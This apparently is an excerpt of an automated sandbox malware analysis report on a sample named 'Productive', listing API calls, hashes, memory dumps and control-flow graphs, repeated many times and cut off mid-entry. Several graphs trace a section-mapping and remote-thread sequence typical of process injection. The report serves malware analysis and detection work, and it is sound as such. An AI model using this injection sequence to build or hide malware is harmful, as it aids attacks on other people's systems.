                                                                                                                                                                • Opcode ID: a2bdddc347ff687e447340c05675b4211db9240fdcfd4d61e136365d52105ac1
                                                                                                                                                                • Instruction ID: 331bc117d0543a3f6973589044e3b308a539adf98f5cabd7abd355744991539b
                                                                                                                                                                • Opcode Fuzzy Hash: a2bdddc347ff687e447340c05675b4211db9240fdcfd4d61e136365d52105ac1
                                                                                                                                                                • Instruction Fuzzy Hash: 94D0123139536836D25672A46C1AFCA6A888B05B51F40442AFB08696C34DE599A04595
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 002F0091
                                                                                                                                                                  • Part of subcall function 0032C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,002F027A,?), ref: 0032C6E7
                                                                                                                                                                  • Part of subcall function 0032C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0032C6F9
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 002F0289
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                                                                • String ID: WIN_XPe
                                                                                                                                                                • API String ID: 582185067-3257408948
                                                                                                                                                                • Opcode ID: 3bd22a0d09a2334586519049637b1917f3087f8dc81748779589299735968036
                                                                                                                                                                • Instruction ID: 8f3f2dd2bc42808a742f1217617aa2f4eef8b0720f6f52ec1dc11b9f9fa4f57e
                                                                                                                                                                • Opcode Fuzzy Hash: 3bd22a0d09a2334586519049637b1917f3087f8dc81748779589299735968036
                                                                                                                                                                • Instruction Fuzzy Hash: 95F03070824109DFCB26DF61C9987FCBBB8AB08380F140099E246B6191CFB05F90DF20
                                                                                                                                                                APIs
                                                                                                                                                                • DestroyIcon.USER32(,z70z7,00377A2C,00377890,?,002C5A53,00377A2C,00377A30,?,00000004), ref: 002C5823
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DestroyIcon
                                                                                                                                                                • String ID: ,z70z7$SZ,,z70z7
                                                                                                                                                                • API String ID: 1234817797-501169708
                                                                                                                                                                • Opcode ID: 3cda14918f199a0d0acf0e043cc4bd2bd944d1dd353e27de2840c6137f1e5925
                                                                                                                                                                • Instruction ID: ec3ef083f3a53638ffcf0aaf5924d73ef5d3d1a7d6d2357e36ff6b7db497bb4e
                                                                                                                                                                • Opcode Fuzzy Hash: 3cda14918f199a0d0acf0e043cc4bd2bd944d1dd353e27de2840c6137f1e5925
                                                                                                                                                                • Instruction Fuzzy Hash: EAE0C232034217EBE7210F08DC00B96FFECAF21321F24821AE08056050D3B1B8F0DB90
                                                                                                                                                                APIs
                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00319EB5
                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00319ECC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                                                                • String ID: aut
                                                                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                                                                • Opcode ID: 9d9aab8621094a3854a4638d3da82b1e74f3b34b578cef304c720d7741a0ae5d
                                                                                                                                                                • Instruction ID: 3db3b62ff1e20c8f7c4ee19a2348989950649cb627e6e636804bc0bb6b2bca62
                                                                                                                                                                • Opcode Fuzzy Hash: 9d9aab8621094a3854a4638d3da82b1e74f3b34b578cef304c720d7741a0ae5d
                                                                                                                                                                • Instruction Fuzzy Hash: B7D05E7964030DABDB51AB90DC0EFDABB2CDB05700F0046A1BF58950E2DFB065948B91
                                                                                                                                                                APIs
                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00335FAB
                                                                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00335FBE
                                                                                                                                                                  • Part of subcall function 003157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00315877
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                • Opcode ID: d90c0265644fa78513f9972482d739bea9687bb1f64b8409b39625eac464c431
                                                                                                                                                                • Instruction ID: b6456f9ddf1587412dbb6202cf95095a475c7d6e592f4d6fac2a54eb5c8df9d8
                                                                                                                                                                • Opcode Fuzzy Hash: d90c0265644fa78513f9972482d739bea9687bb1f64b8409b39625eac464c431
                                                                                                                                                                • Instruction Fuzzy Hash: F5D0C735384311B6E669A7709C5BFD66914AB46750F010415B366DD1D4CDF464508A54
                                                                                                                                                                APIs
                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00335FEB
                                                                                                                                                                • PostMessageW.USER32(00000000), ref: 00335FF2
                                                                                                                                                                  • Part of subcall function 003157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00315877
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                • Opcode ID: 23343f4a85065b5fcd39c4457f6e61065e0100c24781ab93bc18ca4d4beae696
                                                                                                                                                                • Instruction ID: 8ad1cc8d59390e3355e8f2116d54abd41abe909daa5f131a83c3c857b4d3c005
                                                                                                                                                                • Opcode Fuzzy Hash: 23343f4a85065b5fcd39c4457f6e61065e0100c24781ab93bc18ca4d4beae696
                                                                                                                                                                • Instruction Fuzzy Hash: D1D0C735385311BAE669A7709C4BFD66514A746750F010415B366DD1D4CDF464508A54
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002E4928
                                                                                                                                                                • GetLastError.KERNEL32 ref: 002E4936
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002E4989
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002E49C4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1717984340-0
                                                                                                                                                                • Opcode ID: e84ea502bd537f338bf2d8b913369aebe345e7cd8af8506106dbd0642a23c601
                                                                                                                                                                • Instruction ID: 3b0bd32ffdd6f4f8f4e9cd6a557cebd301da0ea6b023eb18cc8b8f46d3962e04
                                                                                                                                                                • Opcode Fuzzy Hash: e84ea502bd537f338bf2d8b913369aebe345e7cd8af8506106dbd0642a23c601
                                                                                                                                                                • Instruction Fuzzy Hash: 2441C834664296AFDB21AF3ACC44BAB7BE8AF02310FA10156F455B7192DB709D30C761

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:0.2%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:24
                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                execution_graph 99756 403095 99757 4031d8 99756->99757 99758 4030bf 99756->99758 99758->99757 99759 40317a RtlCreateUserThread NtTerminateProcess 99758->99759 99759->99757 99760 402f49 99762 402f4e 99760->99762 99761 402fda 99762->99761 99764 4019b5 99762->99764 99765 4019c4 99764->99765 99766 4019f7 Sleep 99765->99766 99767 401a12 99766->99767 99768 401a23 99767->99768 99770 4015dd 99767->99770 99768->99761 99771 4015ec 99770->99771 99772 401691 NtDuplicateObject 99771->99772 99781 4017ad 99771->99781 99773 4016ae NtCreateSection 99772->99773 99772->99781 99774 4016d4 NtMapViewOfSection 99773->99774 99775 40172e NtCreateSection 99773->99775 99774->99775 99777 4016f7 NtMapViewOfSection 99774->99777 99776 40175a 99775->99776 99775->99781 99778 401764 NtMapViewOfSection 99776->99778 99776->99781 99777->99775 99779 401715 99777->99779 99780 40178b NtMapViewOfSection 99778->99780 99778->99781 99779->99775 99780->99781 99781->99768

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F0
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401780
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017A2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 950bd6940925d391b5350045ce0b9c0d7083fc88d4a21137c9115b3d7f0b2d61
                                                                                                                                                                • Instruction ID: 027c1b19b41e682d6f896d3cf43fcec844ce0a3121d5ac049dae3570e0512569
                                                                                                                                                                • Opcode Fuzzy Hash: 950bd6940925d391b5350045ce0b9c0d7083fc88d4a21137c9115b3d7f0b2d61
                                                                                                                                                                • Instruction Fuzzy Hash: 1F6172B4500205FBEB209F91CC49FAF7BB8FF85B00F14012AF912BA1E4D6759901DB65

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 47 4015e8-40163b call 40126c 57 401640-401645 47->57 58 40163d 47->58 60 40164b-40165c 57->60 61 40195d-401965 57->61 58->57 64 401662-40168b 60->64 65 40195b-4019b2 call 40126c 60->65 61->57 64->65 72 401691-4016a8 NtDuplicateObject 64->72 72->65 74 4016ae-4016d2 NtCreateSection 72->74 76 4016d4-4016f5 NtMapViewOfSection 74->76 77 40172e-401754 NtCreateSection 74->77 76->77 81 4016f7-401713 NtMapViewOfSection 76->81 77->65 79 40175a-40175e 77->79 79->65 82 401764-401785 NtMapViewOfSection 79->82 81->77 84 401715-40172b 81->84 82->65 86 40178b-4017a7 NtMapViewOfSection 82->86 84->77 86->65 88 4017ad call 4017b2 86->88 88->65
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F0
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401780
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017A2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 22598deda81885450f9c95381e1811c611b1ee8933057a7aa8e04537a026307c
                                                                                                                                                                • Instruction ID: 6f8bf3908c6f8853ba8f4c72cd110000892ca558590af19d6b41e4659f4c4712
                                                                                                                                                                • Opcode Fuzzy Hash: 22598deda81885450f9c95381e1811c611b1ee8933057a7aa8e04537a026307c
                                                                                                                                                                • Instruction Fuzzy Hash: 76513AB4900205BBEB209F91CC48FAF7FB9FF85B00F140169FA12BA2E5D6759941CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 92 4015f3-40163b call 40126c 104 401640-401645 92->104 105 40163d 92->105 107 40164b-40165c 104->107 108 40195d-401965 104->108 105->104 111 401662-40168b 107->111 112 40195b-4019b2 call 40126c 107->112 108->104 111->112 119 401691-4016a8 NtDuplicateObject 111->119 119->112 121 4016ae-4016d2 NtCreateSection 119->121 123 4016d4-4016f5 NtMapViewOfSection 121->123 124 40172e-401754 NtCreateSection 121->124 123->124 128 4016f7-401713 NtMapViewOfSection 123->128 124->112 126 40175a-40175e 124->126 126->112 129 401764-401785 NtMapViewOfSection 126->129 128->124 131 401715-40172b 128->131 129->112 133 40178b-4017a7 NtMapViewOfSection 129->133 131->124 133->112 135 4017ad call 4017b2 133->135 135->112
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F0
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401780
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017A2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 291f3de6fee0a6777ad6b63f804205d89656aa84186cafa9a46b17dc91493b79
                                                                                                                                                                • Instruction ID: 807214f88c25633123d306824a3987dd23ed185bf9dd2c770211d5cb1857aa2b
                                                                                                                                                                • Opcode Fuzzy Hash: 291f3de6fee0a6777ad6b63f804205d89656aa84186cafa9a46b17dc91493b79
                                                                                                                                                                • Instruction Fuzzy Hash: 71513CB4900205BBEB209F91CC48FAF7BB9EF85B00F14016AFA12BA1E5D6759941CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 139 40160a-40163b call 40126c 148 401640-401645 139->148 149 40163d 139->149 151 40164b-40165c 148->151 152 40195d-401965 148->152 149->148 155 401662-40168b 151->155 156 40195b-4019b2 call 40126c 151->156 152->148 155->156 163 401691-4016a8 NtDuplicateObject 155->163 163->156 165 4016ae-4016d2 NtCreateSection 163->165 167 4016d4-4016f5 NtMapViewOfSection 165->167 168 40172e-401754 NtCreateSection 165->168 167->168 172 4016f7-401713 NtMapViewOfSection 167->172 168->156 170 40175a-40175e 168->170 170->156 173 401764-401785 NtMapViewOfSection 170->173 172->168 175 401715-40172b 172->175 173->156 177 40178b-4017a7 NtMapViewOfSection 173->177 175->168 177->156 179 4017ad call 4017b2 177->179 179->156
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F0
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401780
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017A2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: bc256d874290b390cd0cc8d9675d8c909fe9a71c3689c80c6d77ab5372392494
                                                                                                                                                                • Instruction ID: d6111ea804d99e2475eec483978f2ff1a23ac99f88f2b412a4de5038783d267c
                                                                                                                                                                • Opcode Fuzzy Hash: bc256d874290b390cd0cc8d9675d8c909fe9a71c3689c80c6d77ab5372392494
                                                                                                                                                                • Instruction Fuzzy Hash: C1512CB4900205BFEB209F91CC48FAF7BB9FF85B00F100169FA12BA2E5D6759941CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 226 40160e 227 401625 226->227 228 401616-40163b call 40126c 226->228 227->228 232 401640-401645 228->232 233 40163d 228->233 235 40164b-40165c 232->235 236 40195d-401965 232->236 233->232 239 401662-40168b 235->239 240 40195b-4019b2 call 40126c 235->240 236->232 239->240 247 401691-4016a8 NtDuplicateObject 239->247 247->240 249 4016ae-4016d2 NtCreateSection 247->249 251 4016d4-4016f5 NtMapViewOfSection 249->251 252 40172e-401754 NtCreateSection 249->252 251->252 256 4016f7-401713 NtMapViewOfSection 251->256 252->240 254 40175a-40175e 252->254 254->240 257 401764-401785 NtMapViewOfSection 254->257 256->252 259 401715-40172b 256->259 257->240 261 40178b-4017a7 NtMapViewOfSection 257->261 259->252 261->240 263 4017ad call 4017b2 261->263 263->240
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F0
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401780
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017A2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 9c1b1bf1ae9ea6999bd2292fabd6dfdc100e31a0d90f3bd785b0fb4396cdb4b4
                                                                                                                                                                • Instruction ID: cf69725830b50ba478dae86ba71deb5f682450843f7d6b39e858c2d81bc8b4f6
                                                                                                                                                                • Opcode Fuzzy Hash: 9c1b1bf1ae9ea6999bd2292fabd6dfdc100e31a0d90f3bd785b0fb4396cdb4b4
                                                                                                                                                                • Instruction Fuzzy Hash: 62510AB4900205BBEF209F91CC48FAF7FB9EF85B10F100159FA12BA2E5D6759945CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 267 401613-40163b call 40126c 271 401640-401645 267->271 272 40163d 267->272 274 40164b-40165c 271->274 275 40195d-401965 271->275 272->271 278 401662-40168b 274->278 279 40195b-4019b2 call 40126c 274->279 275->271 278->279 286 401691-4016a8 NtDuplicateObject 278->286 286->279 288 4016ae-4016d2 NtCreateSection 286->288 290 4016d4-4016f5 NtMapViewOfSection 288->290 291 40172e-401754 NtCreateSection 288->291 290->291 295 4016f7-401713 NtMapViewOfSection 290->295 291->279 293 40175a-40175e 291->293 293->279 296 401764-401785 NtMapViewOfSection 293->296 295->291 298 401715-40172b 295->298 296->279 300 40178b-4017a7 NtMapViewOfSection 296->300 298->291 300->279 302 4017ad call 4017b2 300->302 302->279
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F0
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401780
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017A2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 8129929dcf0bbd79af24a81b2c38932e9291217006394cc6761161a9486ba0b2
